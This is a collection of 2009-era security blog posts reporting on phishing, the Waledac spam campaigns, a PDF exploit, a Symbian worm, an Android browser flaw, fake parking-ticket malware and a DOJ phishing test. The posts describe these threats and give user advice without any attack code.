A Middle Finger from the Abbey

A 19 year old in Bristol England man has been banned from having a bank account after falling victim to an email scam. Billy Brown received an email claiming to be from his bank, Abbey of the UK, apparently asking for his account details. Soon after, a check for £8,200 showed up in his bank account, and shortly after that, the same amount was withdrawn. As it turned out, the bank allowed the withdrawl before the check had even cleared, which it didn't, leaving Mr. Brown's account overdrawn by the same £8,200. That's pretty huge, especially for a 19 year old. So, what did his bank do to help? Accused him of being at fault, closed his account and blacklisted his credit rating. Thanks to this blacklisting, no other bank will even allow him to open an account. This is causing some other serious issues as the supermarket where he works will only pay in direct deposits to bank accounts, so now he's not getting paid either. Billy Brown denies ever having given up any of his credentials, but the bank argues otherwise, claiming that it's his own fault. Strangely enough they refuse to explain why they allowed a withdrawl for that much quid, without first verifying the check was good. Even though he is young, and possibly naive, though I've never met this gentlemen, I am just generalizing, I don't believe that this bank should ruin someone this young's financial life, and claim none of the fault. Maybe if they tightened up a little of their practices, this wouldn't have happened whether Mr. Brown had given the bad guys his info or not.
Regardless, he is now taken a lawyer after being rejected by every major bank for a new account including Lloyds, HSBC, Barclays, Halifax, and Natwest. Nationwide building society told him it might be able to offer a basic account without a card he could use in cash machines or shops, meaning he'd have to withdraw any money over the counter.

Waledac's Look du Jour

The Waledac worm, which is Storm Worm reborn, is back with its new look. First it arrives in your inbox offering to save you money with subject lines such as:
A special discount voucher listing
I hope it will be useful for you
Exclusive coupons
All discounts in your city
Save up to 90%!!!!
I want you to save your money, among several others.
The body of the email is short and sweet with lines such as:
Best shops with sale
Buy and save money with these coupons
Hot deals in your city
Want to save money? Look at this!
I sent you useful listing
I found a fantastic bargain Look,
I've found fantastic sale, etc etc
These come along with a link to various websites that carry the payload. These sites offer a printable coupon theme that utilizes your IP address to deliver a more personalized, local accessibility.
Every link on this landing page point towards the download of a file named sale.exe, but you don't need to click the link in order to be infected because there is also a hidden iframe that attempts to pull malicious binaries from a site called chatloveonline.com, which is of course hosted on a fast flux network.

Another New Pdf Exploit Found

According to many sources in the news this morning, Adobe's portable document format, or pdf, is being used to deliver malware once again. Attackers are exploiting a security flaw by creating specially crafted pdf documents in order to exploit a vulnerability within Adobe Reader, and in turn dropping malicious files onto your hard drive. The malicious file types vary, and currently they seem to be targeted towards high ranking individuals in various organizations, but with Adobe announcing that they won't be releasing a patch until March 11th, it's very likely that these will be used in the wild very shortly to take advantage of this situation.
It is highly recommended that you turn off Javascript at least until the patch comes out, and certainly avoid opening any .pdf documents from unknown sources.

Is there a Mobile Botnet in Our Future?

What is now the second piece of mobile malware to hit the scene in 2009, the SymbOS/Yxes.A! worm is under investigation by anti-virus companies Fortinet and F-Secure. This worm has raised some suspicion that we may see our mobile devices in danger of becoming part of a zombie network sometime in the future.
This piece of malware, also known as "Sexy View" is currently targeting devices running SymbianOS 360 3rd edition (e.g. Nokia 3250), but may run on a wider range of devices according to Fortinet.
The worm will likely show up as a SMS message with a link to install the software. It carries a valid certificate from Symbian to help it appear to be a legitimate application. After it installs, it collects all of the phone numbers on the infected device and repeatedly attempts to send SMS messages to them with a URL link to a malicious website where they can infect themselves as well. In addition to this propogation technique, the worm is also gathering other information about the infected user such as the phone's serial number and subscription number which is then sent and stored on a remote computer likely to be sold to other cybercriminals who purchase harvested information. This is a new version of an old practice very similar to directory harvest attacks of the past where spam and malware campaigns would specifically collect valid email addresses with the intentions of selling those lists to marketers and spammers (thin line there).
Ok, back to the botnet part. The fact that this worm contacts and interacts with a remote server, it would theorectically be very easy for the remote server to issue commands back to the infected mobile device, combine that with the worm's aggressive propogation technique, add a pinch of malice, and you've got yourself a cell phone botnet.
As technology advances and morphs, (considering a phone used to be a phone, and nowadays they're just smaller computers that we happen to make phone calls on) so does the innovation of the bad guys. Luckily the fix is still the same as it's always been - prevention. Be smart and aware, and don't go installing random unknown software on your computers or your phones. It's never a good idea.

SchmooCon Brings Android Exploit to Light

This past weekend hackers gathered in the nation's capital at the Wardman Marriot to share the latest and greatest in the hacker community. One talk given by security researcher Charlie Miller of Independent Security Evaluators brought attention to a vulnerability in Google's Android's architecture that was so troubling that Miller advised to avoid using Android's browser at all until it was fixed. Android's multimedia framework which was written by a company called PacketVideo is where the vulnerability in the code lies. If someone were to take advantage of this security flaw, they would gain access to credentials saved by the browser. This would then in turn give them full access to browsing history, or past transactions whether they had been encrypted or not.
This is how the infection would play out: The bad guys would set up a bad website with the malicious code or additionally possibly infect legitimate sites that serve up Android Apps, or even some malicious faux applications themselves. Next they would lie and wait for the masses to hit the infected webpages on their own or use a botnet to blast out an Android themed socially engineered spam campaign to victims' inboxes to lure them in. After that anything that you had done in your Android browser are belong to us.
Miller had contacted Google about the vulnerability back in January, but so far Google has not sent out a patch for it. The strange twist is that it doesn't mean that a patch doesn't exist, because one has since February 7th, Google just hasn't sent it to anyone with their normal updates. It instead sits in Google's code repository doing nothing for even the above average G1 user. It's likely that Google will include this patch in their next update due to the press this exploit is currently getting (I would hope).
This type of exploit was destined to be as I reported in my 2009 forecast. Luckily in this instance the good guys found it first, even though that doesn't really matter if Google isn't taking it upon themselves to push out this patch. The bad guys often rely on these vulnerabilty releases to rush out malware designed to specifically exploit them before people have a chance to patch up. Look at the Conficker worm which is the talk of the town, it was designed to exploit a vulnerability in Window's Server Service that will allow for remote code execution. This vulnerability was quickly patched up by Microsoft, however there are still a reported 5 - 20 million infected machines out there due to the patch getting there too late, or from people that never received the patch that had likely turned off Windows' automatic update feature.
Thanks to ReadWriteWeb.

Waledac, Pushdo and Others Wish You a Happy Valentine's Day!

As you've likely noticed by now, the Valentine's Day themed spam campaigns are in full swing. Waledac (formerly Storm), Pushdo, and Donbot are the big bots behind these nuisances. They all appear fairly similar when they reach your inbox, a plain text message with a link to the goodies. Each botnet at this point offers a little something different along with their spam. The Donbot (kiss the ring) offers a little voyeurism with access to 24/7 sexcams, for a price of course. Pushdo is pushing male enhancement pills, and Storm, um I mean Waledac is serving up the cute puppies and something called a Valentine Devkit. The Devkit, short for development kit, I'm assuming, is supposed to be a program that will help you make your sweetheart a cutesy online V-day card, or something like that. It's not really, in fact it's a bit of malicious software that will help the Waledac worm grow in numbers by recruiting your computer into its botnet militia. Waledac is certainly the most malicious of the bots serving up these V-Day themed emails, and with Waledac's relatively small numbers currently, it is not that widespread. I am going to take a guess that this botnet will continue to grow however, and possibly rival the numbers it maintained in its former life as the Storm Worm.
So if you receive a Valentine's Greeting in your inbox, I'd send it back anyway, because even if it is real, I don't feel that digital eCards should cut it. Where are the flowers and candy?

You Have Parked in a Malware Zone

This one certainly wins points for creativity. Lenny Zeltser of SANS and Savvis Security Consulting, blogged on a malware sample that he was analyzing that began as a fake parking ticket in the lots of Grand Forks, ND. Yes indeed, this guy did some real footwork in attempts to distribute this piece of malware! The tickets read "PARKING VIOLATION This vehicle is in violation of standard parking regulations. To view pictures with information about your parking preferences, go to..." and then the website. Once the dirty violators got to the site they would see pictures of other salt and snow covered vehicles from the area with the license plates blurred out and a link to install what was called the "Picture Search Toolbar" this would in turn contact a remote site to download and install a BHO (Browser Helper Object) for IE. This trojan would eventually begin serving those familiar "you are infected" pop-ups urging you to run a "free" Antivirus 2009 scan of your PC. If you ran the scan, the same old same old would happen, the malware would tell you that you had to pay for the full antivirus product to remove all of the baddies from your PC.
The guy (I'm assuming) that passed out these fake tickets is likely trying to make some money by recruiting for his new PPI hobby. PPI or Pay Per Install, is a way for the malware authors to increase their spread by recuiting other people to help get their malicious programs installed. The link usually has an number specific to each particular person passing them out. These intermediaries get paid every time someone clicks on the link they provide their victims. It's usually something between like $.01 and $.60 per click depending on the country where the install takes place, with U.S. infections fetching larger pay-outs.
This is the first time I have heard of someone actually doing footwork to increase their PPI profits, he's really working for it! Other popular PPI techniques include spamming (of course), or putting the malicious programs up on P2P sites posing as something else.

The One That Got Away

In what may have been designed to raise awareness and teach a few lessons backfired on the Department of Justice after they sent a slew of fake phishing emails to its own employees. For the past two weeks the DOJ employees have been receiving emails from the "Thrift Savings Plan Account Coordinator" encouraging them to give up their login credentials in order to receive information about their 401k programs.
Apparently the Department of Justice has an aware group of employees, because they weren't fooled, and soon the entire DOJ was flooded with interoffice emails warning fellow employees of these malicious messages. In response to this the DOJ calmed down its employees by informing them it was all a "hoax invented and distributed by DOJ to test employee security awareness."
Ok, so maybe it didn't necessarily backfire, perhaps it worked perfectly. Hats off to the DOJ employees for their vigilance.
Want the long version, check the AP here.